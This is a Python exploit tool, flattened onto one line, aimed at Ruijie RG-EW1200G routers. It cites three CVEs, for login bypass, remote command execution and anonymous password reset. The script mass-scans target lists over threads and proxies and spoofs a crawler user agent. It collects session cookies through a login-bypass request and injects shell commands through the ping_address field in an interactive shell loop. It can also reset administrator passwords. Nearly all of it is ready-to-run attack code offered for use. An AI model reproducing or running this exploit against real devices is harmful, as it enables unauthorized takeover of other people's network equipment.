import argparse import copy from user_agent import get_user_agent_pc import requests import os import random import string import time import concurrent.futures import re MIN_VARIABLE_NUM = 1 MAX_VARIABLE_NUM = 10 MAX_LENGTH = 10 requests.packages.urllib3.disable_warnings() headers = None proxies = None timeout = None delay = None thread = None LOGIN_COOKIES = dict() DEFAULT_USER_AGENT = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" def _post_request(session: requests.Session, url: str, data: dict, headers: dict = None) -> (int, requests.Response or str): global proxies try: res = session.post(url=url, json=data, headers=headers, proxies=proxies, verify=False) return 200, res except Exception as e: return 500, f"[!]Unable to access {url} normally, due to{e.args.__str__()}" def _get_content(o: requests.Response, encoding: str = "UTF-8") -> str: _encoding = encoding if o.encoding is None or not o.encoding else o.encoding return o.content.decode(_encoding) def create_random_variable_name(length: int, is_value: bool = False) -> tuple: _start = 0 if is_value else 1 if length < 1 or length > MAX_LENGTH: if is_value: length = 1 else: length = 2 letters = string.ascii_letters nums_letters = string.ascii_letters + string.digits _prefix = ''.join(random.choice(letters) for _ in range(_start)) _suffix = ''.join(random.choice(nums_letters) for _ in range(length)) o = _prefix + _suffix return o, length def create_random_variable_length() -> int: return random.randint(MIN_VARIABLE_NUM, MAX_VARIABLE_NUM) def attack(url: str, attack_url: str, headers: dict = None): session = requests.session() url = url[:-1] if url.endswith("/") else url password, _ = create_random_variable_name(create_random_variable_length(), is_value=True) data = { 'username': "2", 'password': password } code, res = _post_request(session, url + attack_url, data, headers=headers) if code != 200: if LOGIN_COOKIES is not None and LOGIN_COOKIES: if LOGIN_COOKIES.get(url, None) is not None: LOGIN_COOKIES.pop(url) else: # content = _get_content(res) cookie = requests.utils.dict_from_cookiejar(session.cookies) if LOGIN_COOKIES.get(url, None) is None: LOGIN_COOKIES.setdefault(url, cookie) else: LOGIN_COOKIES[url] = cookie print(f"[+]{url} can login by setting cookies:{cookie} ") def task_login_bypass(param: dict): global proxies, headers, timeout, delay, thread, LOGIN_COOKIES urls = parse_param(param) attack_url = "/api/sys/login" _headers = copy.deepcopy(headers) _headers.setdefault('Content-Type', 'application/x-www-form-urlencoded') with concurrent.futures.ThreadPoolExecutor(max_workers=thread) as executor: for url in urls: executor.submit(attack, url, attack_url, _headers) time.sleep(delay) def task_show_cookies(): index = 0 for k, v in LOGIN_COOKIES.items(): print(f"item-{index} -> {k}'s available cookies are {v}") def task_run_command(url: str, cookies: dict, command: str): global proxies, headers, timeout, delay, thread, LOGIN_COOKIES session = requests.session() attack_url = "/bf/ping" _headers = copy.deepcopy(headers) _headers.setdefault('Content-Type', 'application/x-www-form-urlencoded') _cookies = requests.utils.cookiejar_from_dict(cookies, cookiejar=None, overwrite=True) session.cookies = _cookies _command = f"|| {command}" data = { "ping_address": _command, "ping_package_num": 5, "ping_package_size": 56, "is_first_req": 'true' } code, res = _post_request(session, url + attack_url, data, headers=_headers) if code != 200: print(res) return print(_get_content(res)) def task_reset_password(url: str, cookies: dict, username: str, password: str): global proxies, headers, timeout, delay, thread, LOGIN_COOKIES session = requests.session() attack_url = "/api/sys/set_passwd" _headers = copy.deepcopy(headers) _headers.setdefault('Content-Type', 'application/x-www-form-urlencoded') _cookies = requests.utils.cookiejar_from_dict(cookies, cookiejar=None, overwrite=True) session.cookies = _cookies data = { "username": username, "admin_new": password } _confirm = int(input(f"Are you sure to reset the password for {username}(0 for no and 1 for yes):")) if _confirm is not None and _confirm: code, res = _post_request(session, url + attack_url, data, headers=_headers) if code != 200: print(res) return print(_get_content(res)) def set_cmd_arg() -> any: description = 'Ruijie RG-EW1200G: login bypass(CVE-2023-4415) & RCE(CVE-2023-3306) ' \ '& anonymous reset password(CVE-2023-4169)' parser = argparse.ArgumentParser(description=description, add_help=True) targets = parser.add_mutually_exclusive_group(required=True) targets.add_argument('-u', '--url', type=str, help='Enter target object') targets.add_argument("-f", '--file', type=str, help='Input target object file') useragent = parser.add_mutually_exclusive_group(required=False) useragent.add_argument('--random-agent', type=bool, help='Using random user agents') useragent.add_argument('-a', '--useragent', type=str, help='Using the known User-agent') parser.add_argument('-d', '--delay', type=int, required=False, help='Set multi threaded access latency (setting range from 0 to 5)') parser.add_argument('-t', '--thread', type=int, required=False, help='Set the number of program threads (setting range from 1 to 50)') parser.add_argument('--proxy', type=str, required=False, help='Set up the proxy') args = parser.parse_args() return args def parse_cmd_args(args) -> dict: o = dict() if args.url is None or not args.url: o.setdefault('url', {'type': 'file', 'value': args.file}) else: o.setdefault('url', {'type': 'str', 'value': args.url}) options = dict() if args.random_agent is not None and args.random_agent: user_agent = get_user_agent_pc() else: user_agent = DEFAULT_USER_AGENT options.setdefault('user_agent', user_agent) options.setdefault('delay', args.delay if args.delay is not None else 0) options.setdefault('thread', args.delay if args.thread is not None else 1) options.setdefault('proxy', args.proxy if args.proxy is not None else None) o.setdefault('options', {"type": "str", "value": options}) return o def parse_param(o: dict) -> list: global proxies, headers, timeout, delay, thread def check_proxy(content: str) -> (int, str): mode = re.compile("^(?P(http|https|socks4|socks5>))://([A-Za-z0-9]*:[A-Za-z0-9]*@)?([A-Za-z0-9.\-]+)(:[0-9]+)(/[A-Za-z0-9./]*)?", re.I) groups = mode.search(content) if groups is None: return 500, "Unreasonable proxy settings" try: protocol = groups.group("protocol") return 200, protocol except Exception as e: return 404, "Failed to identify the protocol used by the agent" brute_list = get_data_brute_params(o) urls = brute_list.get('url', None) options = brute_list.get('options', None) if options: options = options[0] _proxy = options.get('proxy', None) if _proxy is None or not _proxy: proxies = _proxy else: code, content = check_proxy(_proxy) if code != 200: proxies = _proxy else: proxies = dict() proxies.setdefault(content, _proxy) headers = dict() if headers is None or not headers else headers headers.setdefault("User-Agent", options.get('user_agent', DEFAULT_USER_AGENT)) timeout = options.get('time_out', 0) delay = options.get('delay', 0) thread = options.get('thread', 1) return urls def get_data_brute_params(url_dict: dict) -> dict: brute_list = { 'url': None } for key, value in url_dict.items(): _type = value.get("type") if _type is None or not _type: continue if _type == "file": _value = value.get("value") code, res = get_data_from_file(_value, mode="r") if code != 200: print(res) continue brute_list[key] = res else: brute_list[key] = [value.get('value', None), ] return brute_list def get_data_from_file(filename: str, mode: str) -> tuple: def check_filename(name: str) -> (int, str or None): if not os.path.isabs(name): name = os.path.abspath(os.path.join(os.getcwd(), name)) if not os.path.exists(name): return 404, f"[!]{name} does not exist" if not os.path.isfile(name): return 405, f"[!]{name} is Not a legal document" return 200, name try: code, content = check_filename(filename) if code != 200: return code, content with open(filename, mode=mode) as f: content = f.read().split() return 200, content except Exception as e: return 200, f"[!]Unexpected error occurred during file processing while opening {filename}" def dispatch(obj: dict): print("=" * 100) print("Enter 0 to exit the program!") print("Enter 1 to show all the cookies which has been recorded!") print("Enter 2 to try to login bypass the machine!") print("Enter 3 to try to remote code Execute to control the machine!") print("Enter 4 to try to reset the user's password!") print("=" * 100) action_num = int(input("Current choice is ")) print("=" * 100) while 0 <= action_num < 5: if action_num == 0: print("Good Bye 0u0") break elif action_num == 1: print("[*]We are trying to show all the possible vulnerable website with login Cookies:") task_show_cookies() elif action_num == 2: print("[*]Attacking Logging:") task_login_bypass(obj) elif action_num == 3: print("[*]We are trying to show all the possible vulnerable website with login Cookies:") task_show_cookies() keys = [item for item in LOGIN_COOKIES.keys()] _len = len(keys) _num = int(input("(Please Choice which connection you want to try between 0 and {_len - 1})>>>")) while _num < 0 or _num >= _len: _num = int(input(f"[!]You should Try to enter the num between 0 and {_len - 1}>>>")) url = keys[_num] cookies = LOGIN_COOKIES.get(url, None) command = input("(Please Enter the command you want to exec, such as ping, but enter exit to exit the shell)>>>") while command.lower() != "exit": task_run_command(url, cookies, command) command = input("(Please Enter the command you want to exec, such as ping, but enter exit to exit the shell)>>>") elif action_num == 4: print("[*]We are trying to show all the possible vulnerable website with login Cookies:") task_show_cookies() keys = [item for item in LOGIN_COOKIES.keys()] _len = len(keys) _num = int(input("(Please Choice which connection you want to try, such as 0)>>>")) while _num < 0 or _num >= _len: _num = int(input(f"[!]You should Try to enter the num between 0 and {_len - 1}>>>")) url = keys[_num] cookies = LOGIN_COOKIES.get(url, None) print("[*]We are trying to reset the password, it may be dangerous:") username = input("Please Enter which one you want reset:") password = input("Please Enter the new password:") task_reset_password(url, cookies, username, password) else: print("[-]Terrible Input, Please Again") print("=" * 100) action_num = int(input("Current choice is ")) print("=" * 100) def main() -> None: args = set_cmd_arg() obj = parse_cmd_args(args) task_login_bypass(obj) dispatch(obj) if __name__ == '__main__': main()